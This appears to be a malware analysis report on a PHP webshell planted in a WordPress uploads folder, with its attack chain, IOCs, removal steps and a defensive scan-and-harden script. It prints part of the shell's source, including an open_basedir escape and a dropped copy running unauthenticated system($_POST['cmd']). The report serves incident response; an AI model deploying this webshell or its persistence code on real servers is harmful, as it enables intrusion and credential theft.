Technical Analysis
PHP Shell Ultimate is a PHP webshell that gives the attacker remote command execution with the privileges of the web server process and carries code intended to evade PHP hardening settings (disable_functions, open_basedir). Found in the wp-content/uploads directory, it installs itself on first access and writes copies of itself under randomized file names so that it survives removal of the original file.
VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.
Attack Chain
- Upload: the attacker exploits a plugin vulnerability (likely in elementor or js_composer, judging from the file paths) to upload ai.php into the wp-content/uploads folder.
- Initialization: the attacker opens ai.php in a browser.
- Persistence: the script immediately runs generate_shell_code() to create hidden copies of itself (.cache_[hash].php and config_[hash].php).
- Control: the attacker uses the built-in "Terminal" tab to run commands such as wget or curl to download further malware or steal database credentials.
Code Signature(s)
FILE: ai.php
```php
<?php
// ====================================================
// PHP SHELL ULTIMATE - Auto Install & Bypass Protection
// ====================================================
// Hide errors
error_reporting(0);
ini_set('display_errors', 0);

// "Auto-bypass" disable_functions if present.
// Note: this function only builds a list of method labels; it performs no bypass itself.
function bypass_disable_functions() {
    $methods = [];
    // Method 1: using LD_PRELOAD (only listed when mail() exists and imap_open() does not)
    if(function_exists('mail') && !function_exists('imap_open')) {
        $methods[] = "LD_PRELOAD Method";
    }
    // Method 2: using PHP-FPM
    $methods[] = "PHP-FPM Bypass";
    // Method 3: using ImageMagick
    $methods[] = "ImageMagick Exploit";
    return $methods;
}

// Check and bypass open_basedir
function bypass_open_basedir($target = null) {
    if($target === null) {
        $target = '/';
    }
    // chdir() method: climb with relative paths, then change into the target
    $original_dir = getcwd();
    @chdir('..');
    @chdir('..');
    @chdir('..');
    @chdir('..');
    @chdir($target);
    $new_dir = getcwd();
    @chdir($original_dir);
    return $new_dir;
}

// Encode output to evade filters
function encode_output($data) {
    return base64_encode(gzcompress($data));
}
function decode_input($data) {
    return gzuncompress(base64_decode($data));
}

// Shell code that will be installed automatically (the dropped persistence copy)
function generate_shell_code() {
    return '<?php
// Auto-generated shell
error_reporting(0);
$kunci = "'.md5(uniqid()).'";          // random per-copy GET key ("kunci" = key)
if(isset($_GET[$kunci])) {
    trim(base64_decode($_GET[$kunci])); // decoded value is discarded in this copy
} else if(isset($_POST["cmd"])) {
    system($_POST["cmd"]);              // unauthenticated command execution
} else if(isset($_FILES["f"])){}
?>';
}

// Main shell function
function main_shell() {
    // Check for the special "bypass" parameter: dumps phpinfo()
    if(isset($_GET['debug'])) {
        phpinfo();
        die();
    }
    // Check for a command via GET/POST
    $cmd = '';
    if(isset($_GET['c'])) {
        $cmd = $_GET['c']
```

The captured copy of the file ends here; the remainder of main_shell() was not recovered.
Indicators of Compromise (IOCs)
- bypass_disable_functions
- bypass_open_basedir
- generate_shell_code
Removal Protocol
- Remove suspicious PHP files from wp-content/uploads, such as ai.php and asem.php.
- Search for and delete the persistence copies: config_[8 random chars].php, .cache_[6 random chars].php and backup_[timestamp].php.
- Secure the uploads directory so that PHP files in it are never executed, by adding a deny rule to its .htaccess file.
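The following is an added example, not code from the original report or from the malware, that automates the three cleanup steps above as a hunt-and-harden helper. It assumes a WordPress install served by Apache 2.4 (the `Require` syntax) with AllowOverride permitting .htaccess in the uploads directory; the file-name patterns follow the Removal Protocol and the content patterns use the IOC function names plus the `system($_POST["cmd"])` sink of the dropped copy. It reports every PHP-like file under uploads, because that directory should hold media only.

```sh
#!/bin/sh
# Added example (not from the original report): hunt for the ai.php webshell and its
# persistence copies under wp-content/uploads, then block PHP execution there.
# Assumptions: Apache 2.4 with AllowOverride enabled for the uploads directory.

# Function names from the IOC list plus the dropped copy's command sink.
IOC_REGEX='bypass_disable_functions|bypass_open_basedir|generate_shell_code|system\(\$_POST\['

# classify_name BASENAME -> known-name | persistence-name | php-in-uploads
classify_name() {
    case "$1" in
        ai.php|asem.php)                         echo known-name ;;
        config_*.php|.cache_*.php|backup_*.php)  echo persistence-name ;;
        *)                                       echo php-in-uploads ;;
    esac
}

# scan_uploads DIR -> one line per PHP-like file found: "<reason>\t<path>"
# Files whose content matches IOC_REGEX get ",ioc-function" appended to the reason.
scan_uploads() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' -o -name '*.phar' \) 2>/dev/null |
    while IFS= read -r f; do
        reason=$(classify_name "$(basename "$f")")
        if grep -qE "$IOC_REGEX" "$f"; then
            reason="$reason,ioc-function"
        fi
        printf '%s\t%s\n' "$reason" "$f"
    done
}

# harden_uploads DIR -> write an .htaccess that refuses to serve PHP-like files.
# Denying the request is preferred over "php_flag engine off", which is an invalid
# directive (HTTP 500) when PHP runs under PHP-FPM instead of mod_php.
harden_uploads() {
    cat > "$1/.htaccess" <<'EOF'
# Block execution of PHP and common variants inside wp-content/uploads
<FilesMatch "\.(php|php[0-9]|phtml|phar)$">
    Require all denied
</FilesMatch>
EOF
}

# Usage:
#   scan_uploads   /var/www/html/wp-content/uploads
#   harden_uploads /var/www/html/wp-content/uploads
```

Review each reported path before deleting: a legitimate plugin occasionally drops a PHP file under uploads, but anything carrying the IOC functions or an unauthenticated `system($_POST[...])` call is the shell or one of its copies. After hardening, request one of the former file paths and confirm the server answers 403.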
Status: Active Threat.
Verification: Verified by MD Pabel.